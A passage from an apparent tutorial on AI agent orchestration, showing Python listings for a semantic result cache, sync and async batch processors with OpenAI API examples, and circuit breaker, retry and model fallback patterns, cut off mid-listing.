85 if hashed_key in self.cache:
86 entry = self.cache[hashed_key]
87
88 # Check if expired
89 if entry.expires_at and time.time() > entry.expires_at:
90 del self.cache[hashed_key]
91 self.metrics["misses"] += 1
92 return False, None
93
94 self.metrics["hits"] += 1
95 self.metrics["total_cost_saved"] += entry.cost
96 return True, entry.value
97
98 self.metrics["misses"] += 1
99 return False, None
100
101 def set(self,
102 key: Any,
103 value: Any,
104 ttl: Optional[int] = None,
105 cost: float = 0.0) -> None:
106 """
107 Set an item in the cache.
108
109 Args:
110 key: Cache key
111 value: Value to cache
112 ttl: Time-to-live in seconds (None for default)
113 cost: Cost metric associated with generating this value
114 """
115 ttl = ttl if ttl is not None else self.default_ttl
116 hashed_key = self._hash_key(key)
117
118 with self.lock:
119 # Evict items if at max capacity
120 if len(self.cache) >= self.max_size and hashed_key not in self.cache:
121 self._evict_one()
122
123 expires_at = time.time() + ttl if ttl else None
124
125 self.cache[hashed_key] = CacheEntry(
126 value=value,
127 created_at=time.time(),
128 expires_at=expires_at,
129 cost=cost
130 )
131
132 def delete(self, key: Any) -> bool:
133 """
134 Delete an item from the cache.
135
136 Args:
137 key: Cache key
138
139 Returns:
140 True if item was deleted, False if not found
141 """
142 hashed_key = self._hash_key(key)
143
144 with self.lock:
145 if hashed_key in self.cache:
146 del self.cache[hashed_key]
147 return True
148 return False
149
150 def clear(self) -> None:
151 """Clear all items from the cache."""
152 with self.lock:
153 self.cache.clear()
154
155 def get_metrics(self) -> Dict[str, Any]:
156 """Get cache metrics."""
157 with self.lock:
158 metrics = self.metrics.copy()
159 metrics["size"] = len(self.cache)
160 if metrics["hits"] + metrics["misses"] > 0:
161 metrics["hit_ratio"] = metrics["hits"] / (metrics["hits"] + metrics["misses"])
162 else:
163 metrics["hit_ratio"] = 0
164 return metrics
165
166 def _evict_one(self) -> None:
167 """Evict one item from the cache based on LRU policy."""
168 if not self.cache:
169 return
170
171 # Find the oldest entry
172 oldest_key = min(self.cache, key=lambda k: self.cache[k].created_at)
173 del self.cache[oldest_key]
174 self.metrics["evictions"] += 1
175
176 def _cleanup_loop(self) -> None:
177 """Background thread that cleans up expired entries."""
178 while True:
179 time.sleep(60) # Check every minute
180 self._cleanup_expired()
181
182 def _cleanup_expired(self) -> None:
183 """Remove all expired items from the cache."""
184 now = time.time()
185
186 with self.lock:
187 expired_keys = [
188 k for k, v in self.cache.items()
189 if v.expires_at and now > v.expires_at
190 ]
191
192 for key in expired_keys:
193 del self.cache[key]
194
195class SemanticCache(SmartCache):
196 """
197 Cache that supports semantic similarity matching for AI responses.
198 """
199
200 def __init__(self,
201 embedding_func: Callable[[str], List[float]],
202 **kwargs):
203 """
204 Initialize the semantic cache.
205
206 Args:
207 embedding_func: Function that converts text to embeddings
208 **kwargs: Arguments to pass to SmartCache
209 """
210 super().__init__(**kwargs)
211 self.embedding_func = embedding_func
212 self.embedding_cache = {} # Maps hashed_key to embeddings
213
214 def _compute_similarity(self, embedding1: List[float], embedding2: List[float]) -> float:
215 """
216 Compute cosine similarity between two embeddings.
217
218 Args:
219 embedding1: First embedding
220 embedding2: Second embedding
221
222 Returns:
223 Similarity score (0-1)
224 """
225 import numpy as np
226
227 # Normalize embeddings
228 embedding1 = np.array(embedding1)
229 embedding2 = np.array(embedding2)
230
231 norm1 = np.linalg.norm(embedding1)
232 norm2 = np.linalg.norm(embedding2)
233
234 if norm1 == 0 or norm2 == 0:
235 return 0
236
237 return np.dot(embedding1, embedding2) / (norm1 * norm2)
238
239 def set(self,
240 key: Any,
241 value: Any,
242 ttl: Optional[int] = None,
243 cost: float = 0.0) -> None:
244 """
245 Set an item in the cache with semantic indexing.
246
247 Args:
248 key: Cache key
249 value: Value to cache
250 ttl: Time-to-live in seconds
251 cost: Cost metric
252 """
253 super().set(key, value, ttl, cost)
254
255 # Store embedding for semantic matching if key is a string
256 if isinstance(key, str):
257 try:
258 hashed_key = self._hash_key(key)
259 embedding = self.embedding_func(key)
260 self.embedding_cache[hashed_key] = embedding
261 except Exception as e:
262 logger.warning(f"Failed to compute embedding for cache key: {e}")
263
264 def semantic_get(self, key: str) -> Tuple[bool, Any, float]:
265 """
266 Get an item from the cache using semantic matching.
267
268 Args:
269 key: Query string
270
271 Returns:
272 Tuple of (found, value, similarity)
273 """
274 # First try exact match
275 exact_found, exact_value = self.get(key)
276 if exact_found:
277 return True, exact_value, 1.0
278
279 # If not found, try semantic matching
280 try:
281 query_embedding = self.embedding_func(key)
282
283 best_match = None
284 best_similarity = 0
285
286 with self.lock:
287 for hashed_key, embedding in self.embedding_cache.items():
288 if hashed_key in self.cache: # Ensure it's still in the cache
289 similarity = self._compute_similarity(query_embedding, embedding)
290
291 if similarity > best_similarity:
292 best_similarity = similarity
293 best_match = hashed_key
294
295 # Check if we found a good match
296 if best_match and best_similarity >= self.semantic_cache_threshold:
297 entry = self.cache[best_match]
298
299 # Check if expired
300 if entry.expires_at and time.time() > entry.expires_at:
301 return False, None, 0
302
303 self.metrics["semantic_hits"] += 1
304 self.metrics["total_cost_saved"] += entry.cost
305 return True, entry.value, best_similarity
306
307 return False, None, best_similarity
308
309 except Exception as e:
310 logger.warning(f"Error in semantic matching: {e}")
311 return False, None, 0
312
313 def delete(self, key: Any) -> bool:
314 """
315 Delete an item from the cache.
316
317 Args:
318 key: Cache key
319
320 Returns:
321 True if item was deleted, False if not found
322 """
323 hashed_key = self._hash_key(key)
324
325 with self.lock:
326 if hashed_key in self.embedding_cache:
327 del self.embedding_cache[hashed_key]
328
329 if hashed_key in self.cache:
330 del self.cache[hashed_key]
331 return True
332 return False
333
334 def clear(self) -> None:
335 """Clear all items from the cache."""
336 with self.lock:
337 self.cache.clear()
338 self.embedding_cache.clear()
339
340class AgentResultCache:
341 """
342 Specialized cache for AI agent results with support for partial results and
343 context-aware caching.
344 """
345
346 def __init__(self,
347 embedding_func: Callable[[str], List[float]],
348 max_size: int = 5000,
349 default_ttl: int = 3600,
350 similarity_threshold: float = 0.92):
351 """
352 Initialize the agent result cache.
353
354 Args:
355 embedding_func: Function to convert text to vector embeddings
356 max_size: Maximum cache size
357 default_ttl: Default TTL in seconds
358 similarity_threshold: Threshold for semantic matching
359 """
360 self.semantic_cache = SemanticCache(
361 embedding_func=embedding_func,
362 max_size=max_size,
363 default_ttl=default_ttl,
364 semantic_cache_threshold=similarity_threshold
365 )
366 self.context_cache = {} # For context-specific caching
367
368 def get_result(self,
369 query: str,
370 agent_type: str,
371 context: Optional[Dict[str, Any]] = None) -> Tuple[bool, Any, float]:
372 """
373 Get agent result from cache considering query, agent type, and context.
374
375 Args:
376 query: User query
377 agent_type: Type of agent
378 context: Optional context parameters
379
380 Returns:
381 Tuple of (found, result, similarity)
382 """
383 # Create cache key that includes agent type and essential context
384 cache_key = self._create_cache_key(query, agent_type, context)
385
386 # Try exact context match first
387 exact_found, exact_result = self.semantic_cache.get(cache_key)
388 if exact_found:
389 return True, exact_result, 1.0
390
391 # If not found, try semantic matching on query only
392 return self.semantic_cache.semantic_get(query)
393
394 def store_result(self,
395 query: str,
396 agent_type: str,
397 result: Any,
398 context: Optional[Dict[str, Any]] = None,
399 ttl: Optional[int] = None,
400 cost: float = 0.0) -> None:
401 """
402 Store agent result in cache.
403
404 Args:
405 query: User query
406 agent_type: Type of agent
407 result: Agent result to cache
408 context: Optional context parameters
409 ttl: Optional TTL in seconds
410 cost: Cost metric (e.g., tokens used)
411 """
412 # Create cache key
413 cache_key = self._create_cache_key(query, agent_type, context)
414
415 # Store in semantic cache
416 self.semantic_cache.set(cache_key, result, ttl, cost)
417
418 # Also store with query only for semantic matching
419 self.semantic_cache.set(query, result, ttl, cost)
420
421 def _create_cache_key(self,
422 query: str,
423 agent_type: str,
424 context: Optional[Dict[str, Any]]) -> str:
425 """
426 Create a cache key from query, agent type, and context.
427
428 Args:
429 query: User query
430 agent_type: Type of agent
431 context: Optional context parameters
432
433 Returns:
434 Cache key string
435 """
436 # Start with the query and agent type
437 key_parts = [query, agent_type]
438
439 # Add essential context parameters if provided
440 if context:
441 # Filter to include only cache-relevant context
442 # This prevents minor context changes from invalidating the cache
443 cache_relevant_keys = [
444 'language', 'domain', 'persona', 'level',
445 'format', 'length', 'temperature'
446 ]
447
448 relevant_context = {
449 k: v for k, v in context.items()
450 if k in cache_relevant_keys and v is not None
451 }
452
453 if relevant_context:
454 # Sort to ensure consistent ordering
455 context_str = json.dumps(relevant_context, sort_keys=True)
456 key_parts.append(context_str)
457
458 return "||".join(key_parts)
459
460 def get_metrics(self) -> Dict[str, Any]:
461 """Get cache metrics."""
462 return self.semantic_cache.get_metrics()
463
464 def clear(self) -> None:
465 """Clear the cache."""
466 self.semantic_cache.clear()
467 self.context_cache.clear()

4. Batch Processing for Efficiency

python
1# task_orchestration/batch_processor.py
2import time
3import threading
4import asyncio
5import logging
6from typing import Dict, List, Any, Optional, Callable, Tuple, Generic, TypeVar
7from dataclasses import dataclass
8from queue import Queue
9
10T = TypeVar('T') # Input type
11R = TypeVar('R') # Result type
12
13logger = logging.getLogger(__name__)
14
15@dataclass
16class BatchTask(Generic[T, R]):
17 """A task to be processed in a batch."""
18 id: str
19 input: T
20 callback: Callable[[str, R], None]
21 created_at: float = time.time()
22
23@dataclass
24class BatchResult(Generic[R]):
25 """Result of a batch operation."""
26 results: Dict[str, R]
27 batch_size: int
28 processing_time: float
29
30class BatchProcessor(Generic[T, R]):
31 """
32 Processes tasks in batches for more efficient API calls.
33 """
34
35 def __init__(self,
36 batch_processor_func: Callable[[List[T]], Dict[int, R]],
37 max_batch_size: int = 20,
38 max_wait_time: float = 0.1,
39 min_batch_size: int = 1):
40 """
41 Initialize the batch processor.
42
43 Args:
44 batch_processor_func: Function that processes a batch of inputs
45 max_batch_size: Maximum batch size
46 max_wait_time: Maximum wait time in seconds before processing a batch
47 min_batch_size: Minimum batch size to process
48 """
49 self.batch_processor_func = batch_processor_func
50 self.max_batch_size = max_batch_size
51 self.max_wait_time = max_wait_time
52 self.min_batch_size = min_batch_size
53
54 self.queue = Queue()
55 self.processing_thread = threading.Thread(target=self._processing_loop, daemon=True)
56 self.processing_thread.start()
57
58 self.metrics = {
59 "total_items_processed": 0,
60 "total_batches_processed": 0,
61 "avg_batch_size": 0,
62 "avg_wait_time": 0,
63 "avg_processing_time": 0
64 }
65
66 def submit(self, task_id: str, input_item: T,
67 callback: Callable[[str, R], None]) -> None:
68 """
69 Submit a task for batch processing.
70
71 Args:
72 task_id: Unique ID for the task
73 input_item: Input to process
74 callback: Function to call with the result
75 """
76 task = BatchTask(id=task_id, input=input_item, callback=callback)
77 self.queue.put(task)
78
79 def _processing_loop(self) -> None:
80 """Main processing loop that gathers tasks into batches."""
81 while True:
82 batch = []
83 start_wait = time.time()
84
85 # Get first item (blocking)
86 first_item = self.queue.get()
87 batch.append(first_item)
88
89 # Try to fill batch up to max_batch_size or until max_wait_time
90 batch_timeout = time.time() + self.max_wait_time
91
92 while len(batch) < self.max_batch_size and time.time() < batch_timeout:
93 try:
94 # Non-blocking queue get
95 item = self.queue.get(block=False)
96 batch.append(item)
97 except:
98 # No more items available now
99 if len(batch) >= self.min_batch_size:
100 # We have enough items, process now
101 break
102
103 # Not enough items, wait a bit
104 time.sleep(0.01)
105
106 wait_time = time.time() - start_wait
107
108 # Process the batch
109 self._process_batch(batch, wait_time)
110
111 def _process_batch(self, batch: List[BatchTask[T, R]], wait_time: float) -> None:
112 """
113 Process a batch of tasks.
114
115 Args:
116 batch: List of tasks to process
117 wait_time: Time spent waiting for the batch to fill
118 """
119 if not batch:
120 return
121
122 try:
123 # Extract inputs and create index mapping
124 inputs = []
125 id_to_index = {}
126
127 for i, task in enumerate(batch):
128 inputs.append(task.input)
129 id_to_index[task.id] = i
130
131 # Process the batch
132 start_time = time.time()
133
134 # The batch processor function should return results mapped by index
135 index_results = self.batch_processor_func(inputs)
136
137 processing_time = time.time() - start_time
138
139 # Map results back to tasks by ID and call callbacks
140 for task in batch:
141 index = id_to_index[task.id]
142 result = index_results.get(index)
143
144 try:
145 task.callback(task.id, result)
146 except Exception as e:
147 logger.error(f"Error in callback for task {task.id}: {e}")
148
149 # Update metrics
150 batch_size = len(batch)
151 self.metrics["total_items_processed"] += batch_size
152 self.metrics["total_batches_processed"] += 1
153
154 # Update averages
155 self.metrics["avg_batch_size"] = (
156 (self.metrics["avg_batch_size"] * (self.metrics["total_batches_processed"] - 1) + batch_size) /
157 self.metrics["total_batches_processed"]
158 )
159
160 self.metrics["avg_wait_time"] = (
161 (self.metrics["avg_wait_time"] * (self.metrics["total_batches_processed"] - 1) + wait_time) /
162 self.metrics["total_batches_processed"]
163 )
164
165 self.metrics["avg_processing_time"] = (
166 (self.metrics["avg_processing_time"] * (self.metrics["total_batches_processed"] - 1) + processing_time) /
167 self.metrics["total_batches_processed"]
168 )
169
170 logger.debug(f"Processed batch of {batch_size} items in {processing_time:.3f}s")
171
172 except Exception as e:
173 logger.error(f"Error processing batch: {e}")
174
175 # Call callbacks with error for all tasks
176 for task in batch:
177 try:
178 task.callback(task.id, None)
179 except Exception as callback_error:
180 logger.error(f"Error in error callback for task {task.id}: {callback_error}")
181
182 def get_metrics(self) -> Dict[str, Any]:
183 """Get processor metrics."""
184 metrics = self.metrics.copy()
185 metrics["queue_size"] = self.queue.qsize()
186 return metrics
187
188class AsyncBatchProcessor(Generic[T, R]):
189 """
190 Asynchronous version of the batch processor for use with asyncio.
191 """
192
193 def __init__(self,
194 batch_processor_func: Callable[[List[T]], Dict[int, R]],
195 max_batch_size: int = 20,
196 max_wait_time: float = 0.1,
197 min_batch_size: int = 1):
198 """
199 Initialize the async batch processor.
200
201 Args:
202 batch_processor_func: Function that processes a batch of inputs
203 max_batch_size: Maximum batch size
204 max_wait_time: Maximum wait time in seconds before processing a batch
205 min_batch_size: Minimum batch size to process
206 """
207 self.batch_processor_func = batch_processor_func
208 self.max_batch_size = max_batch_size
209 self.max_wait_time = max_wait_time
210 self.min_batch_size = min_batch_size
211
212 self.queue = asyncio.Queue()
213 self.processing_task = None
214
215 self.metrics = {
216 "total_items_processed": 0,
217 "total_batches_processed": 0,
218 "avg_batch_size": 0,
219 "avg_wait_time": 0,
220 "avg_processing_time": 0
221 }
222
223 async def start(self) -> None:
224 """Start the processing task."""
225 if not self.processing_task:
226 self.processing_task = asyncio.create_task(self._processing_loop())
227
228 async def stop(self) -> None:
229 """Stop the processing task."""
230 if self.processing_task:
231 self.processing_task.cancel()
232 try:
233 await self.processing_task
234 except asyncio.CancelledError:
235 pass
236 self.processing_task = None
237
238 async def submit(self, task_id: str, input_item: T) -> R:
239 """
240 Submit a task for batch processing and await the result.
241
242 Args:
243 task_id: Unique ID for the task
244 input_item: Input to process
245
246 Returns:
247 Processing result
248 """
249 # Create future for the result
250 result_future = asyncio.Future()
251
252 # Define callback that resolves the future
253 def callback(task_id: str, result: R) -> None:
254 if not result_future.done():
255 result_future.set_result(result)
256
257 # Create task
258 task = BatchTask(id=task_id, input=input_item, callback=callback)
259
260 # Submit to queue
261 await self.queue.put(task)
262
263 # Start processing if not already started
264 if not self.processing_task:
265 await self.start()
266
267 # Wait for result
268 return await result_future
269
270 async def _processing_loop(self) -> None:
271 """Main processing loop that gathers tasks into batches."""
272 while True:
273 batch = []
274 start_wait = time.time()
275
276 # Get first item (blocking)
277 first_item = await self.queue.get()
278 batch.append(first_item)
279
280 # Try to fill batch up to max_batch_size or until max_wait_time
281 batch_timeout = time.time() + self.max_wait_time
282
283 while len(batch) < self.max_batch_size and time.time() < batch_timeout:
284 try:
285 # Non-blocking queue get
286 item = self.queue.get_nowait()
287 batch.append(item)
288 except asyncio.QueueEmpty:
289 # No more items available now
290 if len(batch) >= self.min_batch_size:
291 # We have enough items, process now
292 break
293
294 # Not enough items, wait a bit
295 await asyncio.sleep(0.01)
296
297 wait_time = time.time() - start_wait
298
299 # Process the batch
300 await self._process_batch(batch, wait_time)
301
302 async def _process_batch(self, batch: List[BatchTask[T, R]], wait_time: float) -> None:
303 """
304 Process a batch of tasks.
305
306 Args:
307 batch: List of tasks to process
308 wait_time: Time spent waiting for the batch to fill
309 """
310 if not batch:
311 return
312
313 try:
314 # Extract inputs and create index mapping
315 inputs = []
316 id_to_index = {}
317
318 for i, task in enumerate(batch):
319 inputs.append(task.input)
320 id_to_index[task.id] = i
321
322 # Process the batch
323 start_time = time.time()
324
325 # Convert to a coroutine if the function is synchronous
326 if asyncio.iscoroutinefunction(self.batch_processor_func):
327 index_results = await self.batch_processor_func(inputs)
328 else:
329 # Run in a thread pool if it's a blocking function
330 index_results = await asyncio.to_thread(self.batch_processor_func, inputs)
331
332 processing_time = time.time() - start_time
333
334 # Map results back to tasks by ID and call callbacks
335 for task in batch:
336 index = id_to_index[task.id]
337 result = index_results.get(index)
338 task.callback(task.id, result)
339
340 # Update metrics
341 batch_size = len(batch)
342 self.metrics["total_items_processed"] += batch_size
343 self.metrics["total_batches_processed"] += 1
344
345 # Update averages
346 self.metrics["avg_batch_size"] = (
347 (self.metrics["avg_batch_size"] * (self.metrics["total_batches_processed"] - 1) + batch_size) /
348 self.metrics["total_batches_processed"]
349 )
350
351 self.metrics["avg_wait_time"] = (
352 (self.metrics["avg_wait_time"] * (self.metrics["total_batches_processed"] - 1) + wait_time) /
353 self.metrics["total_batches_processed"]
354 )
355
356 self.metrics["avg_processing_time"] = (
357 (self.metrics["avg_processing_time"] * (self.metrics["total_batches_processed"] - 1) + processing_time) /
358 self.metrics["total_batches_processed"]
359 )
360
361 logger.debug(f"Processed batch of {batch_size} items in {processing_time:.3f}s")
362
363 except Exception as e:
364 logger.error(f"Error processing batch: {e}")
365
366 # Call callbacks with error for all tasks
367 for task in batch:
368 try:
369 task.callback(task.id, None)
370 except Exception as callback_error:
371 logger.error(f"Error in error callback for task {task.id}: {callback_error}")
372
373 def get_metrics(self) -> Dict[str, Any]:
374 """Get processor metrics."""
375 metrics = self.metrics.copy()
376 metrics["queue_size"] = self.queue.qsize()
377 return metrics
378
379# Example usage with OpenAI embeddings
380async def openai_embedding_batch_processor(texts: List[str]) -> Dict[int, List[float]]:
381 """
382 Process a batch of texts into embeddings using OpenAI API.
383
384 Args:
385 texts: List of texts to embed
386
387 Returns:
388 Dictionary mapping input indices to embedding vectors
389 """
390 import openai
391
392 try:
393 # Make the API call with all texts at once
394 response = await openai.Embedding.acreate(
395 model="text-embedding-ada-002",
396 input=texts
397 )
398
399 # Map results back to original indices
400 results = {}
401 for i, embedding_data in enumerate(response.data):
402 results[i] = embedding_data.embedding
403
404 return results
405
406 except Exception as e:
407 logger.error(f"Error in batch embedding: {e}")
408 return {}
409
410# Example usage with LLM completions
411async def openai_completion_batch_processor(prompts: List[str]) -> Dict[int, str]:
412 """
413 Process a batch of prompts into completions using OpenAI API.
414
415 Args:
416 prompts: List of prompts
417
418 Returns:
419 Dictionary mapping input indices to completion strings
420 """
421 import openai
422
423 try:
424 # Create a single API call with multiple prompts
425 response = await openai.Completion.acreate(
426 model="text-davinci-003",
427 prompt=prompts,
428 max_tokens=100,
429 n=1,
430 temperature=0.7
431 )
432
433 # Map results back to original indices
434 results = {}
435 for i, choice in enumerate(response.choices):
436 results[i] = choice.text.strip()
437
438 return results
439
440 except Exception as e:
441 logger.error(f"Error in batch completion: {e}")
442 return {}

5. Implementing Graceful Degradation and Fallbacks

python
1# task_orchestration/fallback_strategies.py
2import time
3import random
4import logging
5from typing import Dict, List, Any, Optional, Callable, TypeVar, Generic, Union
6
7T = TypeVar('T') # Input type
8R = TypeVar('R') # Result type
9
10logger = logging.getLogger(__name__)
11
12class CircuitBreaker:
13 """
14 Circuit breaker pattern implementation to prevent cascading failures.
15 """
16
17 CLOSED = "closed" # Normal operation, requests go through
18 OPEN = "open" # Circuit is open, requests fail fast
19 HALF_OPEN = "half_open" # Testing if service is back to normal
20
21 def __init__(self,
22 failure_threshold: int = 5,
23 reset_timeout: float = 60.0,
24 half_open_max_calls: int = 1):
25 """
26 Initialize circuit breaker.
27
28 Args:
29 failure_threshold: Number of failures before opening the circuit
30 reset_timeout: Time in seconds before attempting to reset circuit
31 half_open_max_calls: Maximum number of calls allowed in half-open state
32 """
33 self.failure_threshold = failure_threshold
34 self.reset_timeout = reset_timeout
35 self.half_open_max_calls = half_open_max_calls
36
37 self.state = self.CLOSED
38 self.failure_count = 0
39 self.last_failure_time = 0
40 self.half_open_calls = 0
41
42 def __call__(self, func):
43 """
44 Decorator for functions that should use circuit breaker.
45
46 Args:
47 func: Function to wrap
48
49 Returns:
50 Wrapped function
51 """
52 def wrapper(*args, **kwargs):
53 return self.execute(func, *args, **kwargs)
54 return wrapper
55
56 def execute(self, func, *args, **kwargs):
57 """
58 Execute function with circuit breaker protection.
59
60 Args:
61 func: Function to execute
62 *args, **kwargs: Arguments to pass to the function
63
64 Returns:
65 Result of the function or raises exception if circuit is open
66
67 Raises:
68 CircuitBreakerOpenError: If circuit is open
69 """
70 if self.state == self.OPEN:
71 if time.time() - self.last_failure_time >= self.reset_timeout:
72 logger.info("Circuit half-open, allowing test request")
73 self.state = self.HALF_OPEN
74 self.half_open_calls = 0
75 else:
76 raise CircuitBreakerOpenError(f"Circuit breaker is open until {self.last_failure_time + self.reset_timeout}")
77
78 if self.state == self.HALF_OPEN and self.half_open_calls >= self.half_open_max_calls:
79 raise CircuitBreakerOpenError("Circuit breaker is half-open and at call limit")
80
81 try:
82 if self.state == self.HALF_OPEN:
83 self.half_open_calls += 1
84
85 result = func(*args, **kwargs)
86
87 # Success, reset if needed
88 if self.state == self.HALF_OPEN:
89 logger.info("Success in half-open state, closing circuit")
90 self.state = self.CLOSED
91 self.failure_count = 0
92
93 return result
94
95 except Exception as e:
96 self._handle_failure(e)
97 raise
98
99 def _handle_failure(self, exception):
100 """
101 Handle a failure by updating circuit state.
102
103 Args:
104 exception: The exception that occurred
105 """
106 self.failure_count += 1
107 self.last_failure_time = time.time()
108
109 if self.state == self.HALF_OPEN or self.failure_count >= self.failure_threshold:
110 logger.warning(f"Circuit breaker opening due to {self.failure_count} failures")
111 self.state = self.OPEN
112
113 def reset(self):
114 """Reset the circuit breaker to closed state."""
115 self.state = self.CLOSED
116 self.failure_count = 0
117 self.half_open_calls = 0
118
119 def get_state(self) -> Dict[str, Any]:
120 """Get the current state of the circuit breaker."""
121 return {
122 "state": self.state,
123 "failure_count": self.failure_count,
124 "last_failure_time": self.last_failure_time,
125 "half_open_calls": self.half_open_calls,
126 "reset_time": self.last_failure_time + self.reset_timeout if self.state == self.OPEN else None
127 }
128
129class CircuitBreakerOpenError(Exception):
130 """Error raised when circuit breaker is open."""
131 pass
132
133class RetryStrategy:
134 """
135 Retry strategy with exponential backoff and jitter.
136 """
137
138 def __init__(self,
139 max_retries: int = 3,
140 base_delay: float = 1.0,
141 max_delay: float = 60.0,
142 jitter: bool = True,
143 retry_on: Optional[List[type]] = None):
144 """
145 Initialize retry strategy.
146
147 Args:
148 max_retries: Maximum number of retries
149 base_delay: Base delay in seconds
150 max_delay: Maximum delay in seconds
151 jitter: Whether to add randomness to delay
152 retry_on: List of exception types to retry on, or None for all
153 """
154 self.max_retries = max_retries
155 self.base_delay = base_delay
156 self.max_delay = max_delay
157 self.jitter = jitter
158 self.retry_on = retry_on
159
160 def __call__(self, func):
161 """
162 Decorator for functions that should use retry strategy.
163
164 Args:
165 func: Function to wrap
166
167 Returns:
168 Wrapped function
169 """
170 def wrapper(*args, **kwargs):
171 return self.execute(func, *args, **kwargs)
172 return wrapper
173
174 def execute(self, func, *args, **kwargs):
175 """
176 Execute function with retry strategy.
177
178 Args:
179 func: Function to execute
180 *args, **kwargs: Arguments to pass to the function
181
182 Returns:
183 Result of the function
184
185 Raises:
186 Exception: The last exception if all retries fail
187 """
188 last_exception = None
189
190 for attempt in range(self.max_retries + 1):
191 try:
192 return func(*args, **kwargs)
193 except Exception as e:
194 last_exception = e
195
196 # Check if we should retry this exception
197 if self.retry_on and not any(isinstance(e, ex_type) for ex_type in self.retry_on):
198 logger.debug(f"Not retrying exception {type(e).__name__} as it's not in retry_on list")
199 raise
200
201 if attempt == self.max_retries:
202 logger.warning(f"Max retries ({self.max_retries}) reached, raising last exception")
203 raise
204
205 # Calculate delay with exponential backoff
206 delay = min(self.max_delay, self.base_delay * (2 ** attempt))
207
208 # Add jitter if enabled (prevents thundering herd problem)
209 if self.jitter:
210 delay = delay * (0.5 + random.random())
211
212 logger.info(f"Retry {attempt+1}/{self.max_retries} after {delay:.2f}s due to {type(e).__name__}: {str(e)}")
213 time.sleep(delay)
214
215 # This should never be reached, but just in case
216 raise last_exception if last_exception else RuntimeError("Retry strategy failed")
217
218class FallbackStrategy(Generic[T, R]):
219 """
220 Fallback strategy that tries alternative approaches if primary fails.
221 """
222
223 def __init__(self,
224 fallbacks: List[Callable[[T], R]],
225 should_fallback: Optional[Callable[[Exception], bool]] = None):
226 """
227 Initialize fallback strategy.
228
229 Args:
230 fallbacks: List of fallback functions to try
231 should_fallback: Optional function to decide if fallback should be used
232 """
233 self.fallbacks = fallbacks
234 self.should_fallback = should_fallback
235
236 def __call__(self, primary_func):
237 """
238 Decorator for functions that should use fallback strategy.
239
240 Args:
241 primary_func: Primary function to wrap
242
243 Returns:
244 Wrapped function
245 """
246 def wrapper(*args, **kwargs):
247 return self.execute(primary_func, *args, **kwargs)
248 return wrapper
249
250 def execute(self, primary_func, *args, **kwargs):
251 """
252 Execute primary function with fallbacks if needed.
253
254 Args:
255 primary_func: Primary function to execute
256 *args, **kwargs: Arguments to pass to the function
257
258 Returns:
259 Result of the primary function or a fallback
260
261 Raises:
262 Exception: If all fallbacks fail
263 """
264 # Try primary function first
265 try:
266 return primary_func(*args, **kwargs)
267 except Exception as primary_exception:
268 # Check if we should fallback
269 if self.should_fallback and not self.should_fallback(primary_exception):
270 logger.debug(f"Not using fallback for {type(primary_exception).__name__}: {str(primary_exception)}")
271 raise
272
273 logger.info(f"Primary function failed with {type(primary_exception).__name__}, trying fallbacks")
274
275 # Try each fallback
276 last_exception = primary_exception
277
278 for i, fallback in enumerate(self.fallbacks):
279 try:
280 logger.info(f"Trying fallback {i+1}/{len(self.fallbacks)}")
281 return fallback(*args, **kwargs)
282 except Exception as fallback_exception:
283 logger.warning(f"Fallback {i+1} failed with {type(fallback_exception).__name__}: {str(fallback_exception)}")
284 last_exception = fallback_exception
285
286 # All fallbacks failed
287 logger.error("All fallbacks failed")
288 raise last_exception
289
290class ModelFallbackChain:
291 """
292 Chain of LLM models to try, falling back to less capable models if primary fails.
293 """
294
295 def __init__(self, model_configs: List[Dict[str, Any]]):
296 """
297 Initialize the model fallback chain.
298
299 Args:
300 model_configs: List of model configurations in priority order
301 """
302 self.model_configs = model_configs
303
304 async def generate(self,
305 prompt: str,
306 max_tokens: int = 1000,
307 temperature: float = 0.7) -> Dict[str, Any]:
308 """
309 Generate a response using the model chain.
310
311 Args:
312 prompt: Text prompt
313 max_tokens: Maximum tokens to generate
314 temperature: Temperature for generation
315
316 Returns:
317 Response with text and metadata
318
319 Raises:
320 Exception: If all models fail
321 """
322 import openai
323
324 last_exception = None
325 for i, config in enumerate(self.model_configs):
326 model = config["model"]
327 timeout = config.get("timeout", 60)
328 retry_count = config.get("retry_count", 1)
329
330 logger.info(f"Trying model {i+1}/{len(self.model_configs)}: {model}")
331
332 for attempt in range(retry_count):
333 try:
334 start_time = time.time()
335
336 response = await openai.ChatCompletion.acreate(
337 model=model,
338 messages=[{"role": "user", "content": prompt}],
339 max_tokens=max_tokens,
340 temperature=temperature,
341 timeout=timeout
342 )
343
344 generation_time = time.time() - start_time
345
346 return {
347 "text": response.choices[0].message.content,
348 "model_used": model,
349 "generation_time": generation_time,
350 "fallback_level": i,
351 "was_fallback": i > 0
352 }
353
354 except Exception as e:
355 last_exception = e
356 logger.warning(f"Model {model} attempt {attempt+1}/{retry_count} failed: {str(e)}")
357
358 # Add exponential backoff between retries
359 if attempt < retry_count - 1:
360 backoff = (2 ** attempt) * 0.5 * (0.5 + random.random())
361 time.sleep(backoff)
362
363 # All models failed
364 logger.error("All models in fallback chain failed")
365 raise last_exception if last_exception else RuntimeError("All models failed")
366
367class DegradedModeHandler:
368 """
369 Handler for operating in degraded mode when resources are limited.
370 """
371
372 NORMAL = "normal"
373 DEGRADED = "degraded"
374 CRITICAL = "critical"
375
376 def __init__(self, degradation_threshold: float = 0.7, critical_threshold: float = 0.9):
377 """
378 Initialize the degraded mode handler.
379
380 Args:
381 degradation_threshold: Resource usage threshold for degraded mode
382 critical_threshold: Resource usage threshold for critical mode
383 """
384 self.degradation_threshold = degradation_threshold
385 self.critical_threshold = critical_threshold
386 self.current_mode = self.NORMAL
387 self.resource_usage = 0.0
388
389 def update_resource_usage(self, usage: float) -> None:
390 """
391 Update current resource usage and mode.
392
393 Args:
394 usage: Current resource usage (0-1)
395 """
396 self.resource_usage = usage
397
398 # Update mode based on resource usage
399 if usage >= self.critical_threshold:
400 if self.current_mode != self.CRITICAL:
401 logger.warning(f"Entering CRITICAL mode (resource usage: {usage:.2f})")
402 self.current_mode = self.CRITICAL
403 elif usage >= self.degradation_threshold:
404 if self.current_mode == self.NORMAL:
405 logger.warning(f"Entering DEGRADED mode (resource usage: {usage:.2f})")
406 self.current_mode = self.DEGRADED
407 else:
408 if self.current_mode != self.NORMAL:
409 logger.info(f"Returning to NORMAL mode (resource usage: {usage:.2f})")
410 self.current_mode = self.NORMAL
411
412 def get_agent_config(self, agent_type: str) -> Dict[str, Any]:
413 """
414 Get configuration for an agent based on current mode.
415
416 Args:
417 agent_type: Type of agent
418
419 Returns:
420 Agent configuration
421 """
422 # Base configuration
423 base_config = {
424 "max_tokens": 4000,
425 "temperature": 0.7,
426 "timeout": 60,
